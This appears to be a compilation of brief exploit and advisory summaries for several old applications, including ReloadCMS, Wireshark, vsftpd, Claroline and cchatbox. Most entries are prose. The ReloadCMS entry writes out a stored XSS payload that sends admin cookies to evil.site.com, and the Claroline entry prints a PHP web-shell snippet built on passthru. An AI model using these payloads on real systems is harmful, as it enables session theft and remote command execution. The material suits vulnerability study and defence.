ReloadCMS do not properly sanitize User-Agent request header before to store it in stats.dat file. Example of an attack, through netcat: rgod>nc target.host.com 80 GET /path_to_reloadcms/ HTTP/1.0 User-Agent: "><script>window.open("http://evil.site.com/grab.php?c="+document.cookie+"&ref="+document.URL);window.close();</script> Host: target.host.com Connection: Close So, when admin see site statistics through the administration panel, javascript will run Once grab.php script captures admin cookie, the script itself can upload a shell trough filemanager, launch commands and write output to a logfile also, inside cookies, there is admin MD5 password hash
This module uses a vulnerability in the OpenView Omniback II service to execute arbitrary commands. This vulnerability was discovered by DiGiT and his code was used as the basis for this module. For Microsoft Windows targets, due to module limitations, use the "unix/cmd/generic" payload and set CMD to your command. You can only pass a small amount of characters (4) to the command line on Windows.
The LWRES dissector in Wireshark version 0.9.15 through 1.0.10 and 1.2.0 through 1.2.5 allows remote attackers to execute arbitrary code due to a stack-based buffer overflow. This bug found and reported by babi. This particular exploit targets the dissect_getaddrsbyname_request function. Several other functions also contain potentially exploitable stack-based buffer overflows. The Windows version (of 1.2.5 at least) is compiled with /GS, which prevents exploitation via the return address on the stack. Sending a larger string allows exploitation using the SEH bypass method. However, this packet will usually get fragmented, which may cause additional complications. NOTE: The vulnerable code is reached only when the packet dissection is rendered. If the packet is fragmented, all fragments must be captured and reassembled to exploit this issue.
This exploit allows an attacker to include local files on the target system
The text describes two vulnerabilities in the MySms v1.0 application. The first vulnerability is an Authentication Bypass, which allows an attacker to bypass authentication by using a specific input. The second vulnerability is Cross-Site Request Forgery (CSRF), which allows an attacker to perform unauthorized actions on behalf of a user.
This is a proof-of-concept code for exploiting the CVE-2011-0762 vulnerability in vsftpd. The vulnerability allows remote attackers to cause a denial of service (DoS) by sending a specially crafted command to the FTP server. The affected version is 2.3.2, and the fix is available in version 2.3.4.
This vulnerability allows an attacker to execute arbitrary commands on the target system. The vulnerability exists in the "scormExport.inc.php" file of Claroline version 1.7.4 and below. By exploiting this vulnerability, an attacker can execute commands with the privileges of the web server. This vulnerability requires the target server to have "register_globals" and "allow_url_fopen" settings enabled. The attacker needs to provide the target server IP/hostname, the path to Claroline, and an arbitrary location with the code to include. Optional parameters such as port and proxy can also be specified. The exploit works by including a remote location that contains malicious code. The remote location should contain either "lib/fileUpload.lib.php/index.html" or "lib/pclzip/pclzip.lib.php/index.html", which should have the following code: if (get_magic_quotes_gpc()){$_GET[cmd]=strisplashes($_GET[cmd]);} error_reporting(0); ini_set("max_execution_time",0); echo "*delim*"; passthru($_GET[cmd]); echo "*delim*"; die;
This Perl script is an exploit for the cchatbox portal that allows SQL injection. It is designed to retrieve information from the database, including the MySQL version, data directory, user, and database. It also retrieves user information such as ID, group, username, password, salt, and email.
This exploit takes advantage of an integer truncation vulnerability in MS Windows XP. It allows an attacker to execute arbitrary code with kernel privileges.
PHP Exif extension for 64bit platforms is affected by a casting vulnerability that occurs during the image header parsing. According to our preliminary analysis, exploitation of this flaw results in Denial of Service.
Services By CQR